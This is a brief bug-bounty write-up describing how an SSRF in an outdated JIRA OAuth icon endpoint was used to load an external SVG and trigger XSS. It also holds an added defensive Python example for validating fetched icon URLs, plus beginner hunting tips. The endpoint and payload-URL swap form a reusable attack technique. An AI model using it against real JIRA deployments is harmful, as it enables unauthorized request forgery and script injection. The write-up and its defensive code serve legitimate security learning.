SSRF to XSS - $750 Story


According to PortSwigger, Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization’s infrastructure, or to external third-party systems.

According to OWASP, Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Let’s get started:

While testing a domain, I found a subdomain which was using a JIRA instance. I checked the version with the Wappalyzer tool; it was “version 5.8.X”, and this version was vulnerable to SSRF. I remembered the write-up of “Alyssa Herrera” (“https://infosecwriteups.com/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a”).

There was an endpoint “plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com”.

So I followed the write-up. I went to the brute-XSS blog, replaced http://google.com with http://brutelogic.com.br/poc.svg... Boom, XSS popped up.
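The defender's side of the same pattern, as an added example that is not part of the original write-up or of JIRA's code: a server that fetches a user-supplied icon URL (the consumerUri case above) should allowlist the destination, refuse hosts that resolve to internal addresses, and only return raster image bodies, since an SVG fetched through such an endpoint is served from the application's own origin. The allowlist hosts and the `resolve` hook for offline testing are constructed assumptions.

```python
"""Hardened handling of a user-supplied icon URL (added example, not JIRA code)."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist: the only hosts an icon may be fetched from.
ALLOWED_ICON_HOSTS = {"icons.example.com", "static.example.org"}
# Raster types only: SVG is XML and can carry script, so it is deliberately absent.
SAFE_IMAGE_TYPES = {"image/png", "image/jpeg", "image/gif", "image/webp"}
# Magic bytes used to cross-check the declared Content-Type.
MAGIC = {b"\x89PNG\r\n\x1a\n": "image/png", b"\xff\xd8\xff": "image/jpeg",
         b"GIF8": "image/gif", b"RIFF": "image/webp"}


def is_public_address(ip: str) -> bool:
    """Reject loopback, link-local, private and other special-purpose ranges."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_icon_url(url: str, resolve=None) -> str:
    """Return the URL if it may be fetched, otherwise raise ValueError.

    `resolve` (hypothetical hook) maps a hostname to a list of IP strings; it
    defaults to DNS via socket.getaddrinfo and is injected in tests. The fetch
    itself should connect to the resolved address to avoid a rebinding race.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_ICON_HOSTS:
        raise ValueError("host not in allowlist")
    resolve = resolve or (lambda h: [ai[4][0] for ai in socket.getaddrinfo(h, None)])
    addrs = resolve(host)
    if not addrs or not all(is_public_address(a) for a in addrs):
        raise ValueError("host resolves to a non-public address")
    return url


def validate_icon_response(content_type: str, body: bytes) -> bool:
    """Accept only raster images, and never trust the declared type alone."""
    declared = content_type.split(";")[0].strip().lower()
    if declared not in SAFE_IMAGE_TYPES:
        return False
    # An SVG or HTML body mislabelled as image/png still fails this check.
    return any(body.startswith(sig) and mime == declared for sig, mime in MAGIC.items())
```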

I also want to share some tips for beginners on how to succeed in bug bounties.

- Try to hunt in less crowded programs.
- Search for targets with a large scope.
- Don't focus on the main domain; focus on subdomains.
- Last but not least, keep trying.

You can also follow me on LinkedIn and Twitter.

Hope you guys learnt something new. If you liked it, share it with your fellow hackers. I’ll be posting 2 write-ups a week. Until then, goodbye!
